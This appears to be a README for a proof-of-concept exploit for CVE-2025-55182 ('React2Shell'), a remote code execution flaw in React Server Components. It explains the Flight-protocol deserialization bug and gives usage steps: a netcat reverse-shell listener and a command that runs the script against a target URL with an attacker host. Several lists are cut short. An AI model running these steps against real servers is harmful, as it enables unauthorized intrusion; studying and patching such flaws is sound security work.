
Proof-of-concept exploit for CVE-2025-55182 (React2Shell), an unauthenticated remote code execution vulnerability in React Server Components via crafted Flight protocol payloads.
CVE-2025-55182, also known as React2Shell, is a critical unauthenticated Remote Code Execution (RCE) vulnerability affecting React Server Components packages (versions 19.0, 19.1.0, 19.1.1, and 19.2.0).
This vulnerability may allow attackers to achieve arbitrary code execution on vulnerable servers via a single crafted HTTP request, without requiring authentication.
React Server Components use the Flight protocol to serialize and deserialize component data exchanged between client and server.
Improper validation during this deserialization process may allow specially crafted payloads to manipulate internal object structures and reach dangerous JavaScript execution primitives.
The vulnerability originates from insufficient validation during deserialization of React Server Components (RSC) Flight protocol payloads.
Specially crafted payloads may:
multipart/form-data requestStart a listener on your machine:
nc -lvnp 4444
Run the exploit:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
To mitigate this vulnerability:
- OffSec – CVE-2025-55182 Exploitation Analysis
- Microsoft Security – Defending Against React2Shell
- React Security Advisory (Official Disclosure)
This project is provided strictly for:
The authors assume no responsibility for misuse or damage caused by this material. Users are solely responsible for complying with all applicable laws and regulations.